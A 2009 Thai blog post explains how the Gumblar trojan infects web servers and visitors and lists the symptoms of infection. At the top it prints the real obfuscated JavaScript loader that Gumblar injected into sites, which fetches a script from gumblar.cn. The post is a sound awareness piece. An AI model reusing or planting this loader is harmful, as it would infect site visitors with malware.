Gumblar : สุดยอดโทรจัน - ปั่นหัวนักท่้องเว็บ

Posted by Apsara at 1:30 PM . Thursday, August 27, 2009
Labels: , , ,
  • Agregar a Technorati
  • Agregar a Del.icio.us
  • Agregar a DiggIt!
  • Agregar a Yahoo!
  • Agregar a Google
  • Agregar a Meneame
  • Agregar a Furl
  • Agregar a Reddit
  • Agregar a Magnolia
  • Agregar a Blinklist
  • Agregar a Blogmarks

(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

..... เอาไวรัสมาปล่อยกันหรือเปล่า จากโค้ดด้านบน? ... ใช่ครับแต่ก็ไม่เชิงเพราะมันเป็น code ของ Trojan ชื่อ Gumblar เพื่อนของไวรัสซึ่้งก่อกวนผู้ใช้คอมพิวเตอร์และอินเทอร์เน็ตเหมือนกัน โทรจันตัวนี้แพร่ระบาดไปอย่างรวดเร็วแม้กระทั่งเว็บไซต์ดังๆ เช่น Tennis.com, Variety.com และ Coldwellbanker.com ก็ยังติดเข้าไปด้วย โดยการเข้าไปที่โปรแกรม FTP ของเครื่องแล้วมองหาไฟล์ต่างๆ ในเว็บเซิร์ฟเวอร์ แล้วฝังตัวเองไว้ในไฟล์นั้นโดยหน้าตา code ที่ถูกฝังเข้าไปก็เป็นอย่างข้างต้น

IBM Internet Security Systems ให้รายเอียดว่า "Gumblar is a botnet that infects Web servers and  infected Web site visitors for the purposes of installing malcode  on Personal Computers (PCs) that redirects end-user Google searches to fraudulent Web sites." ซึ่งหมายความว่า "Gumblar เป็น botnet ที่จะติดเซิร์ฟเวอร์และผู้เข้าเว็บไซต์ที่มีตัวมันอยู่ โดยจะติดตั้ง malcode (โปรแกรมก่อกวนต่างๆ ) บนเครื่องคอมพิวเตอร์ ซึ่งผู้ใช้ Google ค้นหาข้อมูลจะถูก redirect พาไปยังเว็บไซต์เป้าหมาย (เว็บหลอกลวง) ต่างๆ"

..... Gumblar เริ่มออกระับาดเดือนมีนาคม 2009 และัในเดือนพฤษภาคมก็เพิ่มขึ้นกว่า 188% พบว่าข้อมูลเว็บไซต์ทั่วโลกที่ติด Trojan แล้ว Gumblar ครองแชมป์อันดับหนึ่งถึง 42% รู้จักกันในชื่อว่า Troj/JSRedir-R หรือ Troj/PHPMod-A และรองชนะเลิศอันดับที่ 1 คือ Mal/Iframe-F ที่ครองไปอยู่ 7% เห็นได้ว่า Gumblar ทิ้งห่างอย่างขาดรอย

 
..... การโจมตีของ Gumblar แบ่งเป็นช่วงๆ หลังจากเริ่มเมื่อเดือนมีนาคมจนระบาดไปมากแล้ว พอถึงราวต้นเดือนพฤษภาคมเหล่าเว็บมาสเตอร์ก็เริ่มทยอยกำจัด และในขณะเดียวกัน Gumblar ก็ได้เปลี่ยน code ตัวเองโดยสร้าง code ใหม่โดย Javascript ที่ซับซ้อน เมื่อ code ได้เปลี่่ยนไปแล้วก็ทำให้โปรแกรม Antivirus ต่างๆ ตรวจไม่พบอีกเพราะ Signature ที่เปลี่ยนไป
การทำงานของ Gumblar
..... สำหรับฝั่ง Client Side หรือเครื่องผู้ใช้ที่ติืด Gumblar จะใช้ช่องโหว่ (Exploit) Adobe Reader และ Flash ไปแก้ไขผลการ Search จาก Google เมื่อใช้ Internet Explorer ในการค้นหาข้อมูล และเข้าใช้โปรแกรม FTP ที่มีอยู่ในเครื่่องเข้าไปใส่ Code โดยวิธีการที่เรียกว่า Code Injection เข้าไปในไฟล์ประเภท .php .js .html ฯลฯ ทำให้เมื่อมีผู้เข้าใช้เว็บไซต์นั้นแทนที่จะแสดงหน้าเว็บเพจที่ถูกต้อง กลับถูก Redirect ไปยังเว็บไซต์จีนเว็บหนึ่งแต่ใช้โฮสในรัสเซีย และต่อจากนั้นก็จะพยายามเปิดไฟล์ PDF และ SWF ที่ยังมีช่องโหว่ความปลอดภัยอยู่ แล้วติดตั้ง malware ชื่อ Troj/Daonol-Fam

..... การโจมตีของ Gumblar แบ่งเป็นช่วงๆ หลังจากเริ่มเมื่อเดือนมีนาคมจนระบาดไปมากแล้ว พอถึงราวต้นเดือนพฤษภาคมเหล่าเว็บมาสเตอร์ก็เริ่มทยอยกำจัด และในขณะเดียวกัน Gumblar ก็ได้เปลี่ยน code ตัวเองโดยสร้าง code ใหม่โดย Javascript ที่ซับซ้อน เมื่อ code ได้เปลี่่ยนไปแล้วก็ทำให้โปรแกรม Antivirus ต่างๆ ตรวจไม่พบอีกเพราะ Signature ที่เปลี่ยนไป

ลักษณะอาการหลังจากติด Gumblar แล้ว
  1. Gumblar อาจถูกติดตั้งโดยไม่รู้ตัว จากการ Download โปรแกรมต่างๆ พวก Freeware/Shareware ซึ่งอาจมี Gumblar ติดมาด้วย เมื่อติดตั้งแล้ว Gumblar สามารถเปลี่ยนแปลงระบบความปลอดภัยได้ ก็สามารถแอบส่งข้อมูลสำคัญออกไป
  2. Gumblar คอยดูพฤติกรรมการท่องเว็บของผู้ใช้ หรือดูการกดแป้นต่างๆ ทั้งหมด ส่งกลับไป ต่อจากนั้นก็วิเคราะห์แล้วส่งโฆษณาที่เกี่ยวข้องกับพฤติกรรมกลับมา และขายพฤติกรรมการท่องเว็บและข้อมูลสำคัญต่างๆ ของผู้ใช้ให้กับคนอื่นต่อๆ ไป หากเป็นข้อมูลสำคัญอย่างเช่นการใช้ธนาคารทางอินเทอร์เน็ต อาจสร้างความเสียหายเป็นอย่างสูงได้
  3. Gumblar จะส่งป๊อบอัพโฆษณามารบกวน เมื่อได้รับข้อมูลพฤติกรรมการท่องเว็บแล้ว ก็จะส่งโฆษณามารบกวนตลอดในขณะใช้งานอินเทอร์เน็ต หรือแม้่กระทั่งขณะทำงานอย่างอื่น หรือเมื่อคอมพิวเตอร์ยังไม่ได้ใช้งานแล้วเปิดทิ้่งไว้
  4. Gumblar อาจเปลี่ยนแปลงค่าต่างๆ ใน Web browser และส่งเราไปยังหน้าอื่นๆ หรือติดตั้งทูลบาร์ต่างๆ บน Browser และไม่สามารถเอาออกได้
  5. Gumblar ทำให้ระบบโดยรวมของเครื่องช้าลง หากสังเกตได้ว่าเครื่องทำงานช้าลง หรือค้างบ่อยๆ เนื่องจากมีโปรแกรมอื่นทำงานแย่งทรัพยากรระบบแบบซ่อนตัวอยู่ (resident) สันนิษฐานได้ว่าเครื่องติดโปรแกรมต่างๆ ที่ไม่ต้องการรวมถึง Gumblar เช่นกัน
[Gumblar : ตอน 2 | เผยความลับ 12 ข้อเกี่ยวกับ Gumblar]

0 comments:

Subscribe to: Post Comments (Atom)
Post a Comment